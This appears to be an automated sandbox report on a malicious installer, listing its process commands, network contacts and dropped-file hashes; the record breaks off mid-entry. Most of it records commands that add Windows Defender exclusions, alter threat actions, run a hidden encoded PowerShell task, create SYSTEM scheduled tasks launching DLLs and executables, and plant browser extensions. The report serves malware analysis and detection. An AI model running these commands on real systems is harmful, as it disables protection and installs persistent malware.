"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqgFhoPUL" /SC once /ST 00:06:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqgFhoPUL"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqgFhoPUL"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 06:25:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe\" UK /bAsite_idbVJ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe UK /bAsite_idbVJ 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\IjUmhi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\SOeOsXe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 06:14:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll\",#1 /JQsite_idXyH 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll",#1 /JQsite_idXyH 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll",#1 /JQsite_idXyH 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 232.110.86.104.in-addr.arpa udp
GB 172.217.169.46:443 clients2.google.com tcp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
GB 172.217.169.46:443 clients2.google.com tcp
US 44.239.141.158:80 api5.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe

MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

memory/4212-12-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3872-16-0x00007FF8C4D60000-0x00007FF8C5822000-memory.dmp

memory/3872-22-0x0000016838980000-0x0000016838990000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_putfykw4.d5n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3872-23-0x0000016838980000-0x0000016838990000-memory.dmp

memory/3872-27-0x0000016820340000-0x0000016820362000-memory.dmp

memory/3872-30-0x00007FF8C4D60000-0x00007FF8C5822000-memory.dmp

memory/2860-36-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3912-39-0x00000000011C0000-0x00000000011F6000-memory.dmp

memory/3912-40-0x0000000072F10000-0x00000000736C1000-memory.dmp

memory/3912-41-0x0000000001260000-0x0000000001270000-memory.dmp

memory/3912-42-0x0000000003BF0000-0x000000000421A000-memory.dmp

memory/3912-43-0x0000000004250000-0x0000000004272000-memory.dmp

memory/3912-44-0x00000000043F0000-0x0000000004456000-memory.dmp

memory/3912-45-0x0000000004460000-0x00000000044C6000-memory.dmp

memory/3912-54-0x0000000004600000-0x0000000004957000-memory.dmp

memory/3912-55-0x00000000049F0000-0x0000000004A0E000-memory.dmp

memory/3912-56-0x0000000004A30000-0x0000000004A7C000-memory.dmp

memory/3912-57-0x0000000001260000-0x0000000001270000-memory.dmp

memory/3912-60-0x0000000072F10000-0x00000000736C1000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

memory/1300-62-0x0000000072F10000-0x00000000736C1000-memory.dmp

memory/1300-63-0x00000000034D0000-0x00000000034E0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5842dbf59e51aa9cc6f3634e55edf298
SHA1 f5071496f016da26a2eaa8b598478689ea95efdc
SHA256 8142922b90dbf92f40777c9597e9bb144c06503d54bd0de5f3c05176f2f3bd48
SHA512 c9bbfa7ef903e7cf8463ff6ff1e3f2af25b7a5c44852188ec99ebb7a581c307296f9fb0fb5c84e412a7e5bf352b25277439561e325514eb7eaed827edb8014b2

memory/1300-73-0x00000000034D0000-0x00000000034E0000-memory.dmp

memory/1300-75-0x0000000072F10000-0x00000000736C1000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

memory/2204-85-0x00007FF8C4F30000-0x00007FF8C59F2000-memory.dmp

memory/2204-86-0x0000017D5E380000-0x0000017D5E390000-memory.dmp

memory/2204-87-0x0000017D5E380000-0x0000017D5E390000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/2204-92-0x0000017D5E380000-0x0000017D5E390000-memory.dmp

memory/2204-94-0x00007FF8C4F30000-0x00007FF8C59F2000-memory.dmp

memory/4920-99-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/4920-110-0x0000000002130000-0x00000000021B5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 8d3da8f7eb27ef607d2bcee0504fb4aa
SHA1 367ea894e08a603de70cf368a90bcbbe816cf709
SHA256 0771bf084ad0b5708cfe217fbefc775505e8566221f414c92c1d3c382b8feab2
SHA512 7404f77e0659c33d86b2ce3fe2253847c76e17322a8a66d6f54bf665253c9b29fd8f1b6734f6e731842dc0cc0aa53a912edf0f1eca5665c028256758e49bb042

memory/4920-154-0x0000000002A80000-0x0000000002AE5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml

MD5 fce3f44f5677bcfab805c75fd178461e
SHA1 f2736f47fe33bee880f3bf1e84f800baf198f75f
SHA256 7a442a7276d5a92d0e801ba7156afa70d3a1f267746d0fa1b62fc9021723747e
SHA512 318287b63195c09bf0f4de33fef66bc0d8890e3011951022434cb8ba828db0df9e2c4a96ea92735fac0aac8f078f1b3b67eb9c21ed3504340b7993626ee0aee2

C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml

MD5 f4fa1bf0897301ec528383dbedacc14c
SHA1 b9086efa6b7786c53cd881e66f12c202df8da322
SHA256 f15c1ae8840b424026a378df54222c74bea4ad5996fa6fa2263e0d2d4214fdc4
SHA512 1aeb1b19e3f8dab8f2632bb849e19414303b8b5e70dd64089d498f0977a135b817cf977e3a4c4e6acf20df76ec62f342e180dbc37412c3c4de32cb4d910206a1

C:\ProgramData\WkkDuRgYrrqHXcVB\SOeOsXe.xml

MD5 8bcf16d39c18920008da668a38a602e6
SHA1 52d510d4bc97b3b7e9b3148f1e2849099048c5aa
